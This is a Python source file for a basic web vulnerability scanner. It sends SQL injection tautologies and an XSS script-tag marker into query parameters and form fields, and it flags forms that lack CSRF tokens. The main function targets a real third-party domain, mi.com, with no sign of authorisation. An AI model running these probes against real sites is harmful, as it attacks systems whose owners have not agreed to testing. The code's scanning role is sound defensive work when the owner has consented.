import re
from urllib.parse import urljoin

import requests
from bs4 import BeautifulSoup
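def check_sql_injection(url):
    """Print a finding when a quote-bearing value makes ``url`` emit an error page.

    The check is an error-based heuristic: it sends each probe as the value
    of a query parameter named ``param`` and looks for the word "error" in
    the response body. A hit means "worth manual review", not a confirmed
    injection; a target that never reads ``param`` will never react.

    Args:
        url: Page to request. An existing query string is preserved.

    Returns:
        None. Findings are written to stdout.

    Raises:
        requests.RequestException: on connection failure or timeout.
    """
    # Probes are limited to read-only boolean expressions: a detection check
    # must never carry a statement that could modify data on a backend that
    # turns out to be injectable.
    probes = ["' OR '1'='1'", "1' OR 'a'='a"]
    timeout = 10  # requests has no default timeout; without one a stalled host hangs the run

    # Baseline with a benign value: a page that contains "error" anyway
    # (help text, script names, ...) would otherwise be reported for every probe.
    baseline = requests.get(url, params={"param": "1"}, timeout=timeout)
    if "error" in baseline.text.lower():
        return

    for payload in probes:
        # params= percent-encodes the value and merges it with any query
        # string already present, which plain concatenation did not.
        response = requests.get(url, params={"param": payload}, timeout=timeout)
        # "syntax error" also contains "error", so one substring test suffices.
        if "error" in response.text.lower():
            # response.url is the encoded URL that was answered (after redirects).
            print(f"可能存在 SQL 注入漏洞: {response.url}")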
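def check_xss(url):
    """Print a finding for each form on ``url`` that echoes a script tag unescaped.

    Every named ``<input>`` of every form is filled with the same marker
    string, the form is submitted with its declared method, and the response
    body is searched for the marker verbatim.

    A verbatim match shows that the value came back without HTML escaping.
    It does not show that a browser would execute it: the response may not be
    HTML, or the value may sit in a context where it is inert, so a finding
    still needs manual confirmation.

    Args:
        url: Page whose forms are examined.

    Returns:
        None. Findings are written to stdout.

    Raises:
        requests.RequestException: on connection failure or timeout.
    """
    marker = "<script>alert('XSS')</script>"
    timeout = 10  # requests has no default timeout

    page = requests.get(url, timeout=timeout)
    soup = BeautifulSoup(page.text, 'html.parser')

    for form in soup.find_all('form'):
        # A form without an action submits to the page itself. urljoin also
        # handles absolute, root-relative and relative actions, which plain
        # string concatenation with the page URL did not.
        target = urljoin(page.url, form.get('action') or '')
        method = (form.get('method') or 'get').lower()

        data = {
            tag.get('name'): marker
            for tag in form.find_all('input')
            if tag.get('name')
        }
        if not data:
            # No named inputs: nothing of ours would be sent, so a match
            # could only come from the page's own content.
            continue

        if method == 'post':
            result = requests.post(target, data=data, timeout=timeout)
        else:
            result = requests.get(target, params=data, timeout=timeout)

        if marker in result.text:
            print(f"可能存在 XSS 漏洞: {target}")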
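def check_csrf(url):
    """Print a finding when a non-GET form on ``url`` carries no anti-CSRF token.

    Each form is judged on its own: a token in one form does not cover
    another form on the same page, and a page without forms is not reported.
    A token input whose value is empty counts as missing.

    Only hidden-field tokens whose name contains ``csrf_token`` or
    ``csrfmiddlewaretoken`` are recognised. Sites that use another field
    name, a custom request header or SameSite cookies will be reported even
    though they are protected, so a finding needs manual confirmation.

    Args:
        url: Page whose forms are examined.

    Returns:
        None. At most one finding per page is written to stdout.

    Raises:
        requests.RequestException: on connection failure or timeout.
    """
    token_name = re.compile(r'csrf_token|csrfmiddlewaretoken', re.IGNORECASE)

    # requests has no default timeout; without one a stalled host hangs the run.
    response = requests.get(url, timeout=10)
    soup = BeautifulSoup(response.text, 'html.parser')

    for form in soup.find_all('form'):
        # GET is the default method and is meant for safe requests (search
        # boxes and the like); tokens matter for state-changing submissions.
        method = (form.get('method') or 'get').lower()
        if method == 'get':
            continue

        token_input = form.find('input', attrs={'name': token_name})
        if token_input is None or not token_input.get('value'):
            print(f"可能存在 CSRF 漏洞: {url}")
            return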
def main():
    """Run the SQL injection, XSS and CSRF checks, in that order, on one URL."""
    url = "http://mi.com"
    for check in (check_sql_injection, check_xss, check_csrf):
        check(url)
# Run the checks only when this file is executed as a script, so importing
# the module does not send any requests.
if __name__ == "__main__":
    main()